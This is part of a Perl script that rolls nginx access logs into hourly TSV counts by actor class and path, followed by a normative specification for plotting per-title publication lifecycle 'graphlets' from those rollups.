    #    Accept /<root>/<...> and /<root>-dir/index.php
    my $root;
    if ($base =~ m{^/([^/]+)-dir/index\.php$}i) {
        $root = "/" . lc($1);
    } elsif ($base =~ m{^/([^/]+)/}i) {
        $root = "/" . lc($1);
    }

    # 5) Title extraction using existing carrier rules (bound to derived root)
    my $title;

    # Direct page path: /<root>/<Title>
    if (defined $root && $base =~ m{^\Q$root\E/([^/]+)$}i) {
        $title = $1;
    }
    # Canonical index form: /<root>-dir/index.php?...title=<Title>
    elsif (defined $root && $base =~ m{^\Q$root\E-dir/index\.php$}i && exists $q{title} && $q{title} ne '') {
        $title = $q{title};
    }
    # Fallback: page=<Title>
    elsif (defined $root && $base =~ m{^\Q$root\E-dir/index\.php$}i && exists $q{page} && $q{page} ne '') {
        $title = $q{page};
    }

    # 6) If no title, canonicalise as infrastructure/non-title resource
    #    (drop query; normalise trailing slash)
    if (!defined $title) {
        my $canon = $base;
        $canon =~ s{//+}{/}g;
        $canon =~ s{/$}{} unless $canon eq "/";
        return $canon;
    }

    # 7) Canonicalise title (UNCHANGED rules)
    $title =~ tr/_/ /;
    $title =~ s/[–—]/-/g;
    $title =~ s/\s+/ /g;
    $title =~ s/^\s+|\s+$//g;

    # 8) Meta-access classification (MA-3 / MA-4, precedence preserved)
    my $meta = '';

    if ($base =~ m{/index\.php$}i) {
        if (exists $q{docid} && $q{docid} ne '') {
            $meta = 'docid';
        }
        elsif (exists $q{diff} && $q{diff} ne '') {
            $meta = 'diff';
        }
        elsif (exists $q{oldid} && $q{oldid} ne '') {
            $meta = 'version';
        }
        elsif (exists $q{action} && lc($q{action}) eq 'history') {
            $meta = 'history';
        }
        # Optional:
        # elsif (exists $q{action} && lc($q{action}) eq 'info') {
        #     $meta = 'info';
        # }
    }

    # 9) Construct canonical resource key (root-derived)
    # If root could not be derived (rare when a title exists), fall back to
    # the sentinel "/__unknown__" root family rather than failing hard.
    $root //= "/__unknown__";

    if ($meta ne '') {
        return "$root-meta/$meta/$title";
    }
    return "$root/$title";
}

# Identify meta-access resources after normalisation.
# NOTE: This is a *classification helper* only. It must not change non-meta
#       canonicalisation behaviour.
sub is_meta_npath {
    my ($npath) = @_;
    return 0 unless defined $npath;
    return ($npath =~ m{^/[^/]+-meta/}i) ? 1 : 0;
}


sub fmt_ts {
    my ($epoch) = @_;
    my $tp = gmtime($epoch);
    return sprintf("%04d_%02d_%02dT%02d_%02dZ",
        $tp->year, $tp->mon, $tp->mday, $tp->hour, $tp->min);
}

# -------- log regex (captures server_name as final quoted field) --------
my $LOG_RE = qr{
    ^(\S+)\s+\S+\s+\S+\s+\[([^\]]+)\]\s+
    "(GET|POST|HEAD|[A-Z]+)\s+(\S+)[^"]*"\s+
    (\d+)\s+(\d+).*?"[^"]*"\s+"([^"]*)"\s+"([^"]+)"
    (?:\s+(\S+))?\s*$
}x;

# -------- collect files (glob, then mtime ascending) --------
@ARGV or usage();
my @files;
for my $a (@ARGV) { push @files, glob($a) }
@files = sort { (stat($a))[9] <=> (stat($b))[9] } @files;

# -------- bucketed stats --------
# %BUCKETS{bucket_start}{end} = bucket_end
# %BUCKETS{bucket_start}{stats}{server}{page}{metric} = count
my %BUCKETS;

for my $file (@files) {
    print STDERR "$cmd: processing $file\n" if $VERBOSE;

    my $fh;
    if ($file =~ /\.gz$/) {
        $fh = IO::Uncompress::Gunzip->new($file)
            or die "$cmd: gunzip $file: $GunzipError";
    } else {
        open($fh, "<", $file) or die "$cmd: open $file: $!";
    }

    while (<$fh>) {
        next unless /$LOG_RE/;
        my ($ip,$ts,$method,$path,$status,$bytes_sent,$ua,$server_name,$cc) = ($1,$2,$3,$4,$5,$6,$7,$8,$9);
        $bytes_sent ||= 0;

        next if ($SERVER ne "" && $server_name ne $SERVER);

        my $tp = Time::Piece->strptime($ts, "%d/%b/%Y:%H:%M:%S %z");
        my $epoch = $tp->epoch;

        if ($EXCLUDE_LOCAL) {
            next if is_local_ip($ip);
            if ($method eq "POST" && $path =~ /edit/i) {
                next if $tp >= $START_EDIT && $tp <= $END_EDIT;
            }
        }

        my $bucket_start = int($epoch / $PERIOD_SECONDS) * $PERIOD_SECONDS;
        my $bucket_end   = $bucket_start + $PERIOD_SECONDS;

        my $npath  = normalise_path($path);
        my $aclass = agent_class($status, $ua);

        # --- Metadata bucket rule (normative):
        # Only *unattributed* agents (aclass == human) performing meta-access
        # are counted under the metadata actor. All attributed agents (ai/bot/
        # curlwget/badbot) remain in their existing buckets even when accessing
        # metadata resources.
        if ($aclass eq 'human' && is_meta_npath($npath)) {
            $aclass = 'metadata';
            # $npath  = canon_ua($ua);
        }

        my $metric;
        if ($aclass eq "badbot") {
            $metric = "badbot_308";
        } else {
            my $mb = method_bucket($method);
            my $sb = status_bucket($status);
            $metric = join("_", $aclass, $mb, $sb);
        }

        $BUCKETS{$bucket_start}{end} = $bucket_end;
        $BUCKETS{$bucket_start}{stats}{$server_name}{$npath}{$metric}++;
        $BUCKETS{$bucket_start}{stats}{$server_name}{$npath}{total_hits}++;
        $BUCKETS{$bucket_start}{stats}{$server_name}{$npath}{total_bytes} += $bytes_sent;
    }
    close $fh;
}

# -------- write outputs --------
# NOTE: metadata is a first-class actor bucket (unattributed meta-access only).
my @ACTORS  = qw(curlwget ai bot human metadata);
my @METHODS = qw(get head post put other);
my @SB      = qw(ok redir client_err other);

my @COLS;
for my $a (@ACTORS) {
    for my $m (@METHODS) {
        for my $s (@SB) {
            push @COLS, join("_", $a, $m, $s);
        }
    }
}
push @COLS, "badbot_308";
push @COLS, "total_bytes";
push @COLS, "total_hits";
push @COLS, "server_name";
push @COLS, "path";

for my $bstart (sort { $a <=> $b } keys %BUCKETS) {
    my $bend = $BUCKETS{$bstart}{end};
    my $out = File::Spec->catfile(
        $OUTDIR,
        fmt_ts($bstart) . "-to-" . fmt_ts($bend) . ".tsv"
    );

    print STDERR "$cmd: writing $out\n" if $VERBOSE;

    open my $outf, ">", $out or die "$cmd: write $out: $!";
    print $outf join("\t", @COLS), "\n";

    my $stats = $BUCKETS{$bstart}{stats};

    for my $srv (sort keys %$stats) {
        for my $p (sort {
                # sort pages by total_hits, highest first
                ($stats->{$srv}{$b}{total_hits} // 0)
                <=>
                ($stats->{$srv}{$a}{total_hits} // 0)
            } keys %{ $stats->{$srv} }
        ) {
            my @vals;

            # emit counters
            my $total = 0;
            for my $c (@COLS) {
                if ($c eq 'total_bytes') {
                        my $tb = $stats->{$srv}{$p}{total_bytes} // 0;
                        push @vals, $tb;
                        next;
                }
                if ($c eq 'total_hits') {
                        my $th = $stats->{$srv}{$p}{total_hits} // 0;
                        push @vals, $th;
                        next;
                }
                if ($c eq 'server_name') {
                    push @vals, $srv;
                    next;
                }
                if ($c eq 'path') {
                    push @vals, $p;
                    next;
                }

                my $v = $stats->{$srv}{$p}{$c} // 0;
                $total += $v;
                push @vals, $v;
            }

            print $outf join("\t", @vals), "\n";
        }
    }
    close $outf;
}

Appendix C - Access Lifecycle Graphlets Projection Invariants

Purpose

Define a deterministic projection from rollup TSV buckets (default hourly) into a publication-centred lifecycle “graphlets” image:

  • X-axis: integer days relative to publication (UTC / Zulu)
  • Y-axis: corpus titles ordered by publication datetime ascending (earliest first), rendered top-to-bottom in that order
  • For each title row:
    • Human page readership signal rendered as a filled envelope above the baseline (blue)
    • Meta inspection signal rendered as a filled envelope below the baseline (orange, inverted)
  • Labels include: "<title> (<publication_datetime_utc>) (h:<human_total>, m:<meta_total>)"

This projection is intended to show qualitative lifecycle shape per title (lead-in, peak, decay) and comparative ordering by publication date. Magnitude comparison across titles MAY be shown, but MUST obey the scaling invariants declared herein.

Authority and Governance

  • These invariants are normative.
  • The assisting system MUST follow them exactly.
  • The projection MUST be reproducible from declared inputs alone.
  • The assisting system MUST NOT infer publication dates, title membership, or additional titles beyond the manifest.
  • Visual encoding is a governed semantic property; “pretty” optimisations that change semantics are prohibited.

Authoritative Inputs

  • Input A: ROLLUPS — a directory or tar archive of hourly TSV bucket files produced by logrollup (Appendix B).
  • Input B: MANIFEST — corpus/manifest.tsv from corpus bundle (corpus.tgz), containing at minimum:
    • Title (authoritative MediaWiki title)
    • Publication datetime in UTC (Zulu) for published titles
  • Input C: Projection parameters (explicitly declared in run metadata):
    • Publication root path (default "/pub")
    • Meta root encoding (default "/pub-meta" or "<root>-meta" family; see Appendix B)
    • Human amplification factor (H_AMP) for display (default 1; may be >1 for diagnostic visibility)
    • Lead-window minimum (LEAD_MIN_DAYS) (default 10 days)
    • MA window size (MA_N_DAYS) (default 7)
    • ROW_MAX (maximum envelope half-height in row units; default 0.42)
    • MARGIN (row separation safety margin in row units; default 0.08)
    • X major tick step (days) default 10
    • X minor tick step (days) default 5
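For reproducibility, the declared defaults above can be captured as a single run-metadata record; the key names in this sketch are illustrative, not normative:

```python
# Illustrative run-metadata defaults for the lifecycle graphlets projection.
# Values mirror the defaults declared in Input C; key names are assumptions.
PROJECTION_DEFAULTS = {
    "pub_root": "/pub",        # Publication root path
    "meta_root": "/pub-meta",  # Meta root encoding (<root>-meta family)
    "h_amp": 1,                # Human amplification factor (display-only)
    "lead_min_days": 10,       # Lead-window minimum
    "ma_n_days": 7,            # MA window size
    "row_max": 0.42,           # Max envelope half-height (row units)
    "margin": 0.08,            # Row separation safety margin (row units)
    "x_major_days": 10,        # X major tick step
    "x_minor_days": 5,         # X minor tick step
}
```

A compliant run would emit this record alongside the image so the projection is reproducible from declared inputs alone.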

Output Artefact

A single image containing:

  1. A set of Y-axis rows, one per eligible manifest title, ordered by publication datetime ascending (earliest at top).
  2. For each row, a baseline line (category baseline graticle) at y=0 for that title row.
  3. Two filled envelopes per title row:
    1. Human page GET_ok signal above baseline (blue, filled)
    2. Meta GET-total signal below baseline (orange, filled, inverted)
  4. A vertical reference line at x=0 representing the publication datetime.
  5. A legend describing the two envelopes and the human amplification factor if H_AMP != 1.
  6. X-axis labelled in days relative to publication (UTC / Zulu), with deterministic major and minor ticks and major graticles

LG-0: Projection Semantics

This appendix is governed by the General Graph Projection Invariants:

  • GP-0: Mathematical Direction Semantics
  • GP-0a: Tooling Override Prohibition, and:
    • LG-0a: Bell Envelope extensions:
      • polarity (human ALWAYS Y+, meta ALWAYS Y−)
      • Colour assignment (blue = human, orange = meta; no palette substitution)

No local redefinition or relaxation is permitted.

Time and Calendar Semantics (UTC / Zulu Only)

LG-1: UTC is authoritative for all temporal values

  • Rollup filenames and their bucket_start times SHALL be treated as UTC/Zulu.
  • Manifest publication datetimes SHALL be treated as UTC/Zulu.
  • No local timezone conversion is permitted.
  • Any timezone offsets present in datetimes MUST be normalised to UTC.

LG-2: Bucket start time extraction

  • Each rollup TSV represents a single time bucket.
  • Bucket start time SHALL be derived from the rollup filename.
  • If the filename encodes UTC using a "Z" indicator, that is authoritative.
  • The bucket_start timestamp SHALL be stored internally as an absolute UTC datetime.
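Assuming the filename shape emitted by logrollup's fmt_ts (YYYY_MM_DDThh_mmZ-to-YYYY_MM_DDThh_mmZ.tsv), bucket_start extraction is a pure string parse with no timezone conversion:

```python
from datetime import datetime, timezone

def bucket_start_from_filename(name: str) -> datetime:
    """LG-2 sketch: derive bucket_start from a rollup filename.

    The leading segment before '-to-' is authoritative; the 'Z' suffix
    marks UTC. The exact filename shape is an assumption taken from
    logrollup's fmt_ts output.
    """
    stem = name.split("-to-")[0].rstrip("Z")
    return datetime.strptime(stem, "%Y_%m_%dT%H_%M").replace(tzinfo=timezone.utc)
```

The result is stored as an absolute UTC datetime, satisfying LG-1 and LG-2.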

Title Domain and Eligibility

LG-5: Eligible title set is derived exclusively from MANIFEST

  • Only titles present in MANIFEST are eligible for inclusion.
  • No heuristic discovery of titles from rollups is permitted.

LG-6: Exclude unpublished / invalid-date titles

  • Any manifest title whose publication datetime is invalid, missing, or flagged as an error date SHALL be excluded from this projection.
  • No attempt may be made to “infer” publication from traffic patterns.

LG-7: Title identity and normalisation

Titles extracted from rollups SHALL be normalised using the same governed rules as the corpus projection normatives:

  • URL percent-decoding MUST occur before other steps.
  • "_" MUST be converted to space.
  • UTF-8 dashes (–, —) MUST be converted to ASCII hyphen (-).
  • Whitespace runs MUST be collapsed to a single space and trimmed.
  • After normalisation, the title key MUST match a manifest title key exactly (or resolve via an explicit alias map that maps aliases → manifest keys).
  • Fuzzy matching, punctuation stripping, or approximate matching is prohibited.

Rollup Parsing and Metric Definitions

LG-8: Rollups are the sole traffic source

  • The projection SHALL be computed from rollup TSV buckets only.
  • Raw nginx logs MUST NOT be used.

LG-9: Required TSV schema properties

  • Each TSV row includes:
    • server_name
    • path (canonicalised by logrollup)
    • numeric bins: <actor>_<method>_<outcome> counts
  • Column presence MAY vary, but:
    • human_get_ok MUST be supported for the human page readership signal.
    • metadata_get_ok MUST be supported for the metadata inspection signal.

LG-10: Page vs Meta path separation (MANDATORY)

  • Page access and meta access are disjoint and MUST NOT be merged.
  • Page paths are those whose canonical path begins with:
    • "<PUB_ROOT>/" (default "/pub/") AND does not include "-meta/" and does not include "/pub-meta/".
  • Meta paths are those whose canonical path contains:
    • "-meta/" or "/pub-meta/" (or the configured meta namespace produced by logrollup).
  • The assisting system MUST NOT treat meta paths as page hits.

LG-10a: Actor-class binding
Path classification (page vs meta namespace) is independent of actor classification.
Metadata signal requires BOTH:
  • meta path classification (LG-10), and
  • actor bucket == metadata_*.
The presence of "-meta/" in a path SHALL NOT imply aggregation across all actors.
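A minimal sketch of the LG-10 namespace split (the actor-bucket condition of LG-10a is applied separately, on the actor column, not here):

```python
def classify_path(canon: str, pub_root: str = "/pub") -> str:
    """LG-10 sketch: disjoint page/meta classification of a canonical path."""
    if "-meta/" in canon:                  # covers "/pub-meta/" and the "<root>-meta" family
        return "meta"
    if canon.startswith(pub_root + "/"):
        return "page"
    return "other"                         # infrastructure / non-title resources
```

Because the meta test runs first, a path can never be counted in both classes.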

LG-11: Human page signal definition

For each rollup row R:

  • HUMAN_PAGE_SIGNAL[R] = human_get_ok
  • Only rows classified as page paths (LG-10) contribute.

LG-12: Metadata signal definition (metadata actor only)

For each rollup row R classified as meta path (LG-10):

  • META_SIGNAL[R] = metadata_get_ok

Where:

  • "metadata_get_ok" refers specifically to the metadata actor bucket produced by logrollup.
  • The metadata actor bucket is the anonymous, non-authenticated metadata inspection channel defined by logrollup classification.
  • No other actor buckets (human, bot, ai, curlwget, etc.) SHALL contribute.
  • The projection MUST NOT sum across all "*_get_*" columns.

LG-13: Title extraction from canonical path

  • For page paths:
    • TITLE_RAW = substring after "<PUB_ROOT>/"
  • For meta paths:
    • TITLE_RAW = the final path component after the last "/"
  • TITLE_RAW MUST then be normalised per LG-7 and resolved to a manifest key.
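The two LG-13 extraction branches can be sketched as follows (title_raw is an illustrative helper name; LG-7 normalisation is applied afterwards):

```python
def title_raw(canon: str, pub_root: str = "/pub") -> str:
    """LG-13 sketch: extract TITLE_RAW from a canonical path."""
    if canon.startswith(pub_root + "/") and "-meta/" not in canon:
        return canon[len(pub_root) + 1:]   # page path: substring after "<PUB_ROOT>/"
    return canon.rsplit("/", 1)[-1]        # meta path: final path component
```

The returned string is then normalised per LG-7 and must resolve to a manifest key exactly.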

LG-14: Virtual host handling

  • server_name is first-class and MUST be preserved.
  • If a server filter is applied, it MUST be explicit in run metadata.
  • If no server filter is applied, aggregation across vhosts is permitted only when the curator explicitly supplies rollups that already represent the desired scope.
  • The projection MUST NOT silently combine or drop vhosts without explicit configuration.

LG-17b: Label totals

C2-LABEL-0 (Totals for label content)
H_TOTAL[T] = Σ H[bucket,T] over all buckets in plotted window (pre-MA, pre-log, pre-H_AMP)
M_TOTAL[T] = Σ M[bucket,T] over all buckets in plotted window (pre-MA, pre-log)

Smoothing

MA_HUMAN[D,T] and MA_META[D,T] denote the MA_N_DAYS-day moving averages of the human and meta day series for title T; the pre-MA totals are defined in C2-LABEL-0.

Relative Day Axis

LG-20: X-axis windowing

  • The X-axis minimum MUST include at least LEAD_MIN_DAYS days of lead-in:
    • X_MIN <= -LEAD_MIN_DAYS (default LEAD_MIN_DAYS = 10)
  • The X-axis maximum MUST cover the observed tail in the rollups (latest REL_DAY with non-zero signal) plus a small deterministic padding (e.g., +5 days).
  • The projection MUST NOT hard-code an arbitrary large negative lead window unless required by observed signal or curator-specified override.

Ordering

LG-21: Row ordering is publication datetime ascending

  • Titles MUST be ordered by PUB_DT ascending (earliest first).
  • The rendered visual order MUST match human reading order:
    • earliest title MUST appear at the top row,
    • latest title MUST appear at the bottom row.
  • If the plotting library’s axis direction would invert this, the implementation MUST explicitly map indices to preserve top-to-bottom semantic order.

LG-22: Stable tie-breaking

  • If two titles share identical PUB_DT, the tie MUST be broken deterministically:
    • primary: title lexicographic ascending (UTF-8 codepoint order)
  • No other ordering is permitted.
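The LG-21/LG-22 ordering is a single composite sort key: publication datetime ascending, ties broken by title codepoint order. A sketch (row_order is an illustrative name; titles maps title to UTC publication datetime):

```python
def row_order(titles):
    """LG-21/LG-22 sketch: publication-ascending row order with
    deterministic lexicographic tie-breaking."""
    return sorted(titles, key=lambda t: (titles[t], t))
```

The first element of the result is the earliest title and MUST be rendered as the top row; if the plotting library inverts the y-axis, indices must be remapped to preserve this.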

Graphlets Rendering Semantics

LG-23: Baseline per title row (category baseline graticle)

  • Each title row SHALL have a baseline y=0 line for that row.
  • The baseline line MUST be rendered (thin) across the full x-window.
  • Human envelope SHALL be rendered above that baseline.
  • Meta envelope SHALL be rendered below that baseline (inverted).

LG-24: Envelope encoding (mandatory)

  • Human envelope:
    • colour = blue
    • fill = solid (opaque)
    • direction = upward (positive y relative to baseline)
    • data = MA_HUMAN[D,T] after applying human amplification (LG-26)
  • Meta envelope:
    • colour = orange
    • fill = solid (opaque)
    • direction = downward (negative y relative to baseline)
    • data = MA_META[D,T] (no implicit amplification unless explicitly declared)

LG-25: Fill opacity

  • Fill opacity MUST be fully opaque (alpha = 1.0).
  • Transparent or washed-out fills are prohibited.

LG-26: Human amplification (display-only)

  • A human amplification factor H_AMP MAY be applied to MA_HUMAN for display.
  • H_AMP MUST be explicitly declared in the legend text when H_AMP != 1.
  • Amplification MUST NOT alter any aggregation, smoothing, ordering, or totals; it is strictly a display transform.

LG-27: Scaling modes (must be declared; no silent switching)

The projection MUST use exactly one of the following scaling modes, explicitly declared in run metadata:

Mode A: Global scale (comparative magnitude preserved across titles)

  • A single scale factor is derived from the maximum of the displayed signals over all titles and days:
    • MAX_ALL = max over T,D of max( H_AMP*MA_HUMAN[D,T], MA_META[D,T] )
  • Both envelopes use the same scale factor.

Mode B: Per-title scale (envelope shape emphasised; magnitudes not comparable across titles)

  • For each title T, a local scale factor is derived:
    • MAX_T = max over D of max( H_AMP*MA_HUMAN[D,T], MA_META[D,T] )
  • Both envelopes for T share the same per-title scale factor.

If Mode B is used, the projection MUST NOT imply cross-title magnitude comparability.
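Both scaling modes reduce to a per-title maximum, with Mode A collapsing those maxima to a single global factor. A sketch, assuming the MA series are supplied as per-title lists of day values:

```python
def scale_factors(ma_human, ma_meta, h_amp=1, mode="A"):
    """LG-27 sketch: exactly one declared scaling mode, never both.

    ma_human / ma_meta: dict[title] -> list of smoothed day values.
    Returns dict[title] -> scale factor shared by both envelopes of that title.
    """
    per_title = {
        t: max([h_amp * v for v in ma_human[t]] + list(ma_meta[t]) + [0])
        for t in ma_human
    }
    if mode == "A":                  # global scale: magnitudes comparable across titles
        max_all = max(per_title.values())
        return {t: max_all for t in per_title}
    return per_title                 # Mode B: per-title scale, shape emphasised
```

Whichever mode is used must be declared in run metadata; switching silently between runs is forbidden.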

LG-28: Zero-signal masking (recommended; deterministic)

  • To avoid long flat “rails”, for each title/bucket point:
    • If (H_AMP*MA_HUMAN[bucket,T] == 0) AND (MA_META[bucket,T] == 0), the projection SHOULD omit rendering for that day point (no fill, no outline).
  • If implemented, this behaviour MUST be declared in run metadata.

LG-29: Non-overlap constraint (mandatory)

  • Row vertical spacing MUST be sufficient to prevent envelopes from touching adjacent rows.
  • Let ROW_SPACING be the distance between adjacent row baselines.
  • Let ROW_MAX be the maximum vertical excursion used for envelopes (above and below), expressed in row units.
  • The invariant MUST hold:
    • ROW_MAX <= (ROW_SPACING / 2) - MARGIN
  • MARGIN is a fixed deterministic safety margin (default 0.08 in row units).
  • If the projection cannot satisfy this constraint for the chosen scaling mode and amplification, it MUST fail explicitly rather than silently compressing or overlapping.
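The LG-29 invariant is a simple arithmetic precondition; a sketch of the explicit-failure check (illustrative function name):

```python
def check_row_fit(row_spacing, row_max=0.42, margin=0.08):
    """LG-29 sketch: fail explicitly when envelopes could touch adjacent rows."""
    if row_max > (row_spacing / 2) - margin:
        raise ValueError("LG-29 violated: ROW_MAX exceeds (ROW_SPACING/2) - MARGIN")
    return True
```

With the defaults (ROW_MAX 0.42, MARGIN 0.08) a row spacing of 1.0 row unit sits exactly on the bound; anything tighter must raise rather than compress.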

LG-30: Legend placement

  • The legend MUST be present.
  • The legend MUST NOT obscure plotted envelopes.
  • The legend SHOULD be placed in an area of minimal signal density (commonly the lead-in region x < 0) or a corner that does not overlap.

LG-31: Axis and annotation requirements

  • X-axis label MUST state UTC/Zulu explicitly.
  • The x=0 publication reference MUST be drawn as a vertical line.
  • Major x ticks SHOULD be integers or stable intervals appropriate to the window (e.g., 10 days).
  • Minor x ticks SHOULD be deterministic (e.g., 5 days).
  • Random jitter is prohibited.

LG-36: Day major graticles and minor ticks

  • Major graticles MUST be drawn at every major tick.
  • Minor graticles MUST NOT be drawn; minor ticks remain ticks only.

Label Content

LG-32: Row label format (mandatory)

Each Y-axis label MUST be exactly:

  "<title> (<publication_datetime_utc>) (h:<H_TOTAL>, m:<M_TOTAL>)"

  • publication_datetime_utc MUST be rendered as an ISO-8601 UTC string in compact Zulu form:
    • YYYY-MM-DDTHH:MMZ
    • seconds MUST be omitted
    • "+00:00" MUST NOT be used in place of "Z"
  • h and m totals MUST correspond to the LG-17b totals (C2-LABEL-0), pre-amplification.

LG-38: Label margin sizing (mandatory; minimal sufficient)

  • The left margin MUST be sized to be just sufficient for the widest Y-axis label, with no excessive white space.
  • The implementation MUST compute text extents (or an equivalent deterministic measurement) and set the plotting left margin accordingly.
  • Labels MUST NOT be clipped.

Validation and Verification (MANDATORY)

LG-33: Pre-render validation (data integrity)

A compliant implementation MUST validate:

  • All included titles exist in MANIFEST and have valid UTC publication datetime.
  • No excluded/unpublished titles are included.
  • Title normalisation resolves to manifest keys only (no unresolved titles).
  • HUMAN and META day series cover the full rollup day span with zeros filled (LG-16).

LG-34: Post-render verification (image integrity)

A compliant implementation MUST verify the rendered output satisfies:

  • Fill opacity is opaque (no transparency washout).
  • Row order is visually publication-ascending top-to-bottom.
  • Envelopes do not touch adjacent rows (LG-29).
  • Category baseline graticles are present for all rows (LG-23).
  • Major graticles are present at every major tick (LG-36).
  • Minor graticles are not drawn. (LG-36).
  • Legend is present and does not obscure envelopes.
  • X-axis includes at least LEAD_MIN_DAYS lead-in (LG-20).
  • x=0 reference line is present.
  • Label timestamps are compact Zulu (…THH:MMZ), not “…00:00:00+00:00”.

If any verification fails, the projection MUST be rejected and regenerated.

Forbidden Behaviours

  • Inferring publication dates from traffic.
  • Local timezone conversions.
  • Fuzzy matching titles to manifest.
  • Merging meta hits into page hits.
  • Silent scaling changes between runs without explicit declaration.
  • Transparent fills.
  • Overlapping rows.
  • Excessive left label margin beyond what is required to avoid clipping.

C2-ROLLUPS-Bucket-Native (Revision)

The lifecycle graphlets SHALL be derived directly from rollup bucket files. No intermediate UTC calendar day aggregation is permitted.

C2.1 Authoritative Inputs

C2-ROLL-0 (Bucket Time Derivation)
Rollup bucket start and end times SHALL be parsed exclusively from the filename (UTC “Z”).
No alternate timestamp source is permitted.
C2-ROLL-1 (Bucket Duration Consistency)
All rollups included in a projection SHALL have identical bucket duration (BUCKET_SECONDS).
Mixed bucket durations SHALL cause hard failure.
C2-MAN-0 (Publication Time Authority)
Publication datetimes SHALL be sourced exclusively from manifest.tsv.
All publication times SHALL be treated as UTC.
C2-MAN-1 (Eligibility)
Only titles present in the manifest with valid publication datetime SHALL be eligible.

C2.2 Path and Title Normalisation

C2-NORM-0 (Title Normalisation)
Titles extracted from rollups SHALL be normalised via the governed rename map.
C2-PATH-0 (Signal Classification)
Page paths (e.g. /pub/<Title>) define HUMAN signal.
Meta paths (e.g. /pub-meta/, *-meta/) define META signal.
Querystrings SHALL be stripped before classification.
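
C2-PATH-0 can be sketched minimally as follows; the path prefixes are the examples given above, and the governed implementation appears in Appendix F:

```python
# Minimal sketch of C2-PATH-0: strip the querystring, decode, classify.
from typing import Optional
from urllib.parse import unquote

def classify(path: str) -> Optional[str]:
    p = unquote(str(path).split("?", 1)[0])  # querystring stripped first
    if "-meta/" in p:
        return "META"                        # /pub-meta/, *-meta/
    if p.startswith("/pub/"):
        return "HUMAN"                       # /pub/<Title>
    return None                              # not a classified signal

print(classify("/pub/Some_Title?action=raw"))  # HUMAN
```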

C2.3 Signal Semantics

Let H[bucket, title] be page-only human_get_ok.
Let M[bucket, title] be metadata_get_ok over meta paths only.
C2-SIG-0 (Human Definition)
Human signal SHALL be page-only human_get_ok.
C2-SIG-1 (Metadata Definition — metadata actor only)
Meta signal SHALL be metadata_get_ok on meta paths only.
No other actor buckets SHALL contribute.
C2-POL-0 (Polarity)
Human SHALL render above baseline (Y+).
Meta SHALL render below baseline (Y−).
C2-COL-0 (Colour)
Human SHALL render in blue.
Meta SHALL render in orange.
No palette substitution permitted.

C2.4 Timebase and Relative Axis

C2-TIME-0 (Publication Anchor Bucket)
For each title T:
  • PUB_BUCKET_DT[T] = floor(PUB_DT[T] / BUCKET_SECONDS) × BUCKET_SECONDS
C2-TIME-1 (Relative Bucket Offset)
REL_BUCKET[T, B] = (B − PUB_BUCKET_DT[T]) / BUCKET_SECONDS
C2-TIME-2 (Relative Days)
X_DAYS = REL_BUCKET × (BUCKET_SECONDS / 86400)
The X-axis SHALL represent real-valued days relative to publication.
C2-TIME-3 (Lead Window)
A fixed pre-publication window SHALL be enforced:
  • min_day = −LEAD_DAYS (default 10).
C2-TIME-4 (Right Extent)
max_day SHALL be derived from the latest available rollup bucket.
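
The C2-TIME derivations above can be sketched deterministically in Python. This is a minimal illustration assuming hourly buckets and epoch-second arithmetic; only BUCKET_SECONDS is a governed name, the function names are not:

```python
# Minimal sketch of C2-TIME-0..2, assuming hourly buckets
# (BUCKET_SECONDS = 3600) and integer epoch-second arithmetic.
from datetime import datetime, timezone

BUCKET_SECONDS = 3600

def pub_bucket_epoch(pub_dt: datetime) -> int:
    # C2-TIME-0: floor the publication datetime onto the bucket grid.
    return (int(pub_dt.timestamp()) // BUCKET_SECONDS) * BUCKET_SECONDS

def rel_bucket(bucket_start: datetime, pub_dt: datetime) -> int:
    # C2-TIME-1: signed bucket offset relative to the publication bucket.
    return (int(bucket_start.timestamp()) - pub_bucket_epoch(pub_dt)) // BUCKET_SECONDS

def rel_days(bucket_start: datetime, pub_dt: datetime) -> float:
    # C2-TIME-2: real-valued days relative to publication.
    return rel_bucket(bucket_start, pub_dt) * (BUCKET_SECONDS / 86400.0)

pub = datetime(2026, 2, 1, 10, 30, tzinfo=timezone.utc)  # floors to 10:00Z
b   = datetime(2026, 2, 2, 10, 0, tzinfo=timezone.utc)
print(rel_bucket(b, pub), rel_days(b, pub))  # 24 1.0
```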

C2.5 Moving Average and Compression

C2-MA-0 (MA Parameterisation)
MA window SHALL be configurable via CLI parameter:
--ma-days <float>
Default SHALL be 7.
C2-MA-1 (Bucket-Domain Smoothing)
Smoothing SHALL be performed in bucket domain.
MA_BUCKETS = round(MA_DAYS × 86400 / BUCKET_SECONDS)
If MA_BUCKETS < 1 → set to 1.
If centered smoothing → MA_BUCKETS SHALL be odd.
C2-MA-2 (Boundary Policy)
Boundary handling SHALL be deterministic and declared.
(Current implementation: zero padding.)
C2-LOG-0 (Log Compression)
After smoothing:
  • Human = ln(1 + H_AMP × MA(H))
  • Meta = ln(1 + MA(M))
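
The window derivation and compression above can be illustrated as follows, assuming hourly buckets, the zero-padded centred smoothing declared in C2-MA-2, and the H_AMP default used elsewhere in this document (40.0):

```python
# Illustrative sketch of C2-MA-0..2 and C2-LOG-0.
import numpy as np

BUCKET_SECONDS = 3600
H_AMP = 40.0

def ma_buckets(ma_days: float, centered: bool = True) -> int:
    n = int(round(ma_days * 86400.0 / BUCKET_SECONDS))
    n = max(n, 1)                      # C2-MA-1: never below one bucket
    if centered and n % 2 == 0:
        n += 1                         # centred smoothing needs an odd window
    return n

def smooth_and_compress_human(h: np.ndarray, win: int) -> np.ndarray:
    k = win // 2
    xp = np.pad(h.astype(float), (k, k), constant_values=0.0)  # C2-MA-2
    ma = np.convolve(xp, np.ones(win) / win, mode="valid")
    return np.log1p(H_AMP * ma)        # C2-LOG-0: Human = ln(1 + H_AMP × MA(H))

print(ma_buckets(7.0))  # 169: 168 hourly buckets, bumped to odd
```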

C2.6 Rendering and Layout

C2-Y-0 (Row Ordering)
Rows SHALL be ordered by publication datetime ascending.
C2-Y-1 (Row Label Format)
"<Title> (<publication_datetime_UTC>) (h:<total_h>, m:<total_m>)"
C2-ROW-0 (Non-Overlap Constraint)
ROW_SPACING, ROW_MAX, ROW_MARGIN SHALL enforce non-overlap.
Violation SHALL hard-fail.
C2-VLINE-0 (Publication Marker)
A vertical reference line SHALL be drawn at x = 0.

C2.7 Tick and Grid Invariants

C2-TICK-0 (Tick Anchoring)
All tick positions SHALL be exact multiples of step size and SHALL be anchored at x = 0.
tick = k × step where k ∈ ℤ.
C2-TICK-1 (Step Relationship)
major_step % minor_step SHALL equal 0.
C2-TICK-2 (Labelling)
Only major ticks SHALL be labelled.
Minor tick labels SHALL be suppressed.
C2-TICK-3 (Grid Policy)
Major grid MAY be enabled.
Minor grid SHOULD be disabled.
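
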